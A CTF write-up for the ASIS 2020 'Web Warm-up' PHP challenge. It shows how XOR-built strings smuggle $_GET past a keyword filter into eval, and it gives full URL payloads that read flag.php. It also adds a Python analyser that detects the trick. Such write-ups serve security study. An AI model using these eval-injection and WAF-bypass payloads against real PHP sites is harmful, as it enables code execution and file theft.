Tags: web waf-bypass php waf eval preg_match
# ASIS CTF Quals 2020 – Web Warm-up
* **Category:** web
* **Points:** 33
## Challenge
> Warm up! Can you break all the tasks? I'll pray for you!
>
> read flag.php
>
> Link: http://69.90.132.196:5003/?view-source
## Solution
You have to read the `flag.php` file. Connecting to the URL, you can see the following source code.
```php
$_="`{{{"^"?<>/"; // This is: "_GET" string (byte-wise XOR of the two literals).
```
Then you can call the function whose name is passed in a GET parameter with the following code.
```php
${$_}[_](); // This is $_GET[_]()
```
So the payload that will be executed by the `eval` instruction will be the following.
```php
$_="`{{{"^"?<>/";${$_}[_]();
```
Using a payload like the following will let you execute the `phpinfo` page.
```
http://69.90.132.196:5003/?warmup=$_=%22`{{{%22^%22?%3C%3E/%22;${$_}[_]();&_=phpinfo
```
The complete payload is the following.
```
http://69.90.132.196:5003/?warmup=$_=%22`{{{%22^%22?%3C%3E/%22;$_0=${$_}[_](${$_}[__]);${$_}[___]($_0);&_=file_get_contents&__=flag.php&___=var_dump
```
It can be composed step by step.
```php
$_="`{{{"^"?<>/"; // This is the "_GET" string built above.
$_0=${$_}[_](${$_}[__]); // This is $_0 = $_GET[_]($_GET[__]), i.e. file_get_contents("flag.php")
${$_}[___]($_0); // This is $_GET[___]($_0), i.e. var_dump($_0)
```
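As an added example (not part of the original writeup), a small Python analyser shows why a literal keyword blacklist misses this payload: it URL-decodes the query string, evaluates PHP `"..."^"..."` string XOR literals, and flags the `${$var}[...]()` indirection. The sample query is the writeup's own payload embedded as constructed input; the function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample: the query string from the writeup, as a WAF or log analyser would see it.
SAMPLE_QUERY = ("warmup=$_=%22`{{{%22^%22?%3C%3E/%22;"
                "$_0=${$_}[_](${$_}[__]);${$_}[___]($_0);"
                "&_=file_get_contents&__=flag.php&___=var_dump")

# Superglobal names a naive blacklist would search for literally.
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER", "_FILES"}

# Matches "abc" ^ "xyz" (either quote style); PHP XORs the two strings byte by byte.
XOR_LITERAL = re.compile(r"""(["'])(.*?)\1\s*\^\s*(["'])(.*?)\3""")

# Matches ${$var}[...]( : a variable-variable indexed and then called as a function.
VARIABLE_VARIABLE_CALL = re.compile(r"\$\{\$\w+\}\s*\[[^\]]*\]\s*\(")


def php_string_xor(a: str, b: str) -> str:
    """PHP's string ^ string: byte-wise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def decode_xor_literals(payload: str) -> list[str]:
    """Return the value of every "..."^"..." expression found in the decoded payload."""
    text = unquote(payload)
    return [php_string_xor(m.group(2), m.group(4)) for m in XOR_LITERAL.finditer(text)]


def analyse(payload: str) -> dict:
    """Compare a literal blacklist with decoding: the payload hides _GET from the former."""
    text = unquote(payload)
    decoded = decode_xor_literals(payload)
    return {
        # What a plain substring blacklist would see.
        "literal_superglobal": any(name in text for name in SUPERGLOBALS),
        # What the XOR literals actually evaluate to.
        "xor_decoded": decoded,
        "hidden_superglobal": sorted(s for s in decoded if s in SUPERGLOBALS),
        "variable_variable_call": bool(VARIABLE_VARIABLE_CALL.search(text)),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_QUERY).items():
        print(f"{key}: {value}")
```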
The result of the attack will be the following.
```
string(46) ""
```